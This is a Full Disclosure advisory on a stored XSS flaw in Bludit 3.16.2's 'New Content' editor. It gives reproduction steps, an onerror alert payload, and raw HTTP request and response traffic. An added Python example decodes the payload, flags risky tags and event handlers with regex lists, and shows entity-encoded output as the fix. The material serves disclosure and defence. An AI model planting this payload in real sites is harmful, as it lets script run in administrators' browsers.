# Exploit Title: Stored XSS "Add New Content" Functionality - Bludit v3.16.2
# Date: 07/2025
# Exploit Author: Andrey Stoykov
# Version: 3.16.2
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/


Stored XSS "Add New Content" Functionality #1:

Steps to Reproduce:

1. Log in with an admin account and visit "New Content"
2. In the "Source Code" field enter the following payload:
<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
3. Upon clicking "Preview" the XSS payload triggers


// HTTP POST request add new content

POST /bludit/admin/new-content HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

tokenCSRF=03a860fcc567fed86f6cb57e5877a469ef27e2ac&uuid=b219c568827ee49d5b8be839d6ab1043&type=published&coverImage=&content=<iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)">&category=&description=&date=2025-06-04+15%3A15%3A17&typeSelector=published&position=3&tags=&template=&externalCoverImage=&slug=xss&noindex=0&nofollow=0&noarchive=0&title=xss


// HTTP response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 Jun 2025 19:16:04 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: Bludit
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /bludit/admin/content
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


// HTTP GET request triggering the XSS

GET /bludit/admin/edit-content/xss HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]


// HTTP response

HTTP/1.0 200 OK
Date: Wed, 04 Jun 2025 19:16:06 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: Bludit
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
<!-- Editor -->
<textarea id="jseditor" class="editable h-100" style=""><iframe><textarea></iframe><img+src%3d""+onerror%3d"alert(document.domain)">
[...]
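The edit-content response above reflects the stored `content` field into the editor's textarea without entity-encoding it, and the advisory reports that the Preview step renders it as HTML. The following is an added example, not Bludit's code nor the advisory author's, written in Python rather than Bludit's PHP for convenience. It decodes a constructed copy of the advisory's POST body (the tokenCSRF and uuid values are placeholders), flags the markup constructs in the payload that a defender would want to log or alert on, checks whether the payload could end the textarea early when reflected raw, and shows the entity-encoded reflection the edit page should emit instead. The regex lists and function names are this example's own.

```python
"""
Defender-side check for the editor reflection shown in the advisory.

Added example, not Bludit's code. Decodes a form body shaped like the
advisory's POST, flags risky markup in `content`, and shows the
entity-encoded textarea reflection the edit page should produce.
"""
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the advisory's POST body; token and uuid are placeholders.
SAMPLE_BODY = (
    "tokenCSRF=PLACEHOLDER_TOKEN&uuid=PLACEHOLDER_UUID&type=published&coverImage="
    "&content=<iframe><textarea></iframe>"
    '<img+src%3d""+onerror%3d"alert(document.domain)">'
    "&category=&description=&slug=xss&title=xss"
)

# Inline event handlers (onerror=, onload=, ...) and tags that change the
# parsing context or execute code. Illustrative, not exhaustive: a blocklist
# like this is a detection aid, never a substitute for output encoding.
EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
RISKY_TAG = re.compile(
    r"<\s*/?\s*(script|iframe|object|embed|svg|textarea|style)\b", re.IGNORECASE
)
TEXTAREA_CLOSE = re.compile(r"<\s*/\s*textarea\b", re.IGNORECASE)


def extract_content(body: str) -> str:
    """Decode application/x-www-form-urlencoded (as PHP's $_POST would) and return `content`."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("content", [""])[0]


def risky_markup(content: str) -> list[str]:
    """Return a sorted, de-duplicated list of risky constructs found in content."""
    found = {m.group(0).rstrip(" =\t").lower() for m in EVENT_HANDLER.finditer(content)}
    found |= {m.group(1).lower() for m in RISKY_TAG.finditer(content)}
    return sorted(found)


def breaks_out_of_textarea(content: str) -> bool:
    """True if reflecting content raw inside <textarea> would end the element early.

    The advisory's payload carries <textarea> but no </textarea>, so it does not
    escape the editor's textarea by itself; per the advisory it fires when Preview
    renders the stored content as HTML. A payload containing </textarea> would be
    live in the edit page directly, which is what the encoding below prevents.
    """
    return TEXTAREA_CLOSE.search(content) is not None


def render_textarea(content: str) -> str:
    """Reflect content into the editor safely by entity-encoding it first.

    PHP equivalent: htmlspecialchars($content, ENT_QUOTES, 'UTF-8').
    """
    return '<textarea id="jseditor" class="editable h-100">%s</textarea>' % html.escape(
        content, quote=True
    )


if __name__ == "__main__":
    content = extract_content(SAMPLE_BODY)
    print("decoded content :", content)
    print("risky constructs:", risky_markup(content))
    print("breaks textarea :", breaks_out_of_textarea(content))
    print("safe reflection :", render_textarea(content))
```

Encoding the textarea reflection closes the edit-page sink, but it does not cover the Preview path, which by design turns the stored content into live HTML; that path needs an allowlist HTML sanitizer (DOMPurify or equivalent) applied before the content reaches the DOM, since `<iframe><textarea>` sequences are exactly the kind of context-switching input that naive tag filters mishandle.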
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
